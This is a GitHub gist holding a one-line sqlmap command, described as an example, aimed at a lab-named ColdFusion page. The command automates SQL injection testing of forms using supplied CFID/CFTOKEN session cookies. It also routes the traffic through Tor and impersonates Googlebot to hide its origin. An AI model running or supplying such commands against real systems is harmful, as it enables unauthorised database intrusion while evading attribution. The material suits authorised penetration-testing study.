Created
July 22, 2018 21:47
-
-
Save cmaggiulli/2a9af2ead75b2cf22c4c73236270eb4c to your computer and use it in GitHub Desktop.
Example sqlmap statement using tor and sending coldfusion CFID and CFTOKEN cookies
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
./sqlmap.py -u "http://www.my-security-lab-example.com/index.cfm" --cookie="CFID=14438602; CFTOKEN=c0d7ea59ab207174-42572088-1DD8-B747-629578C7057DE711" --level=3 --risk=1 --tor --tor-type=SOCKS5 --check-tor --tor-port=9050 --forms --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment